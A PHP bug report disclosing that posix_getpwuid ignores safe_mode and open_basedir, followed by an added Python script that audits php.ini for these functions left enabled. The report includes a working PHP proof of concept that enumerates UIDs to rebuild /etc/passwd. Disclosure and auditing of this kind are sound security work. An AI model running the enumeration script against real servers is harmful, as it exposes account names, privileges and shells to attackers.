From: [EMAIL PROTECTED]
Operating system: Unix
PHP version: 4.2.0
PHP Bug Type: *General Issues
Bug description: posix_getpw* bypasses safe_mode and open_basedir

I noticed that many of the posix_* functions DO NOT check whether safe_mode or open_basedir restrict access to the user database, thus allowing a user to rebuild a complete /etc/passwd without permissions to read /etc/passwd or access the /etc directory.

This is dangerous in some cases where logins are kept secret, as it allows a user to know what accounts have what privileges and what accounts have access to a shell or not.

For now there is only one thing to do, disable these functions, but I'm pretty sure that adding checks to see values of safe_mode and/or open_basedir would be a nice thing to do.

Here's a script that rebuilds /etc/passwd when safe_mode is enabled and open_basedir is set to the user home directory:

<?
// Walk the UID range and print each account found in /etc/passwd format.
for ($i = 0; $i < 60000; $i++) {
    if (($tab = @posix_getpwuid($i)) != NULL) {
        echo $tab['name'].":";
        echo $tab['passwd'].":";
        echo $tab['uid'].":";
        echo $tab['gid'].":";
        echo $tab['gecos'].":";
        echo $tab['dir'].":";
        echo $tab['shell']."<br>";
    }
}
?>

On a very large system, if an execution time is set, this will not end up, but hopefully the posix_getpwent() function is missing so the user has to go through all possible uids.

--
Edit bug report at http://bugs.php.net/?id=16733&edit=1
--
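
The workaround named in the report, disabling the functions, can be checked mechanically. The following is an added example, not part of the original bug report or of PHP itself: it reads php.ini text and lists the user-database functions that remain callable while safe_mode or open_basedir is set. The php.ini content and its path are constructed, and the three functions listed alongside posix_getpwuid are an assumption about which related lookups to cover.

```python
import re

# posix_getpwuid is the function used in the report; the other three are its
# by-name and group counterparts (assumed here to need the same treatment).
USERDB_FUNCS = ("posix_getpwuid", "posix_getpwnam",
                "posix_getgrgid", "posix_getgrnam")
TRUTHY = {"1", "on", "true", "yes"}

def parse_ini(text):
    """Return {directive: value} from php.ini text; the last assignment wins."""
    settings = {}
    for line in text.splitlines():
        # Simplification: everything after ';' is treated as a comment, which
        # is fine for Unix-style values (open_basedir uses ':' as separator).
        line = line.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip("\"'")
    return settings

def audit(text):
    """Report user-database functions still callable under a restricted config."""
    s = parse_ini(text)
    restricted = (s.get("safe_mode", "").lower() in TRUTHY
                  or bool(s.get("open_basedir", "")))
    # disable_functions is a list separated by commas and/or spaces.
    names = re.split(r"[,\s]+", s.get("disable_functions", ""))
    disabled = {n.lower() for n in names if n}
    exposed = [f for f in USERDB_FUNCS if f not in disabled]
    return {"restricted": restricted, "exposed": exposed,
            "finding": restricted and bool(exposed)}

# Constructed sample: restrictions are on, but only one lookup is disabled.
SAMPLE_INI = """\
[PHP]
safe_mode = On
open_basedir = /home/alice      ; constructed path
disable_functions = exec, system, posix_getpwuid
"""

if __name__ == "__main__":
    result = audit(SAMPLE_INI)
    if result["finding"]:
        print("restricted config still exposes:", ", ".join(result["exposed"]))
```
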